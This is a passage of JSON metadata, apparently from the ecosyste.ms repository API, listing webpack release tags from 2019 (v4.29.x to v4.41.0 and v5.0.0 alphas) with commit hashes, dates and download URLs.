ories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url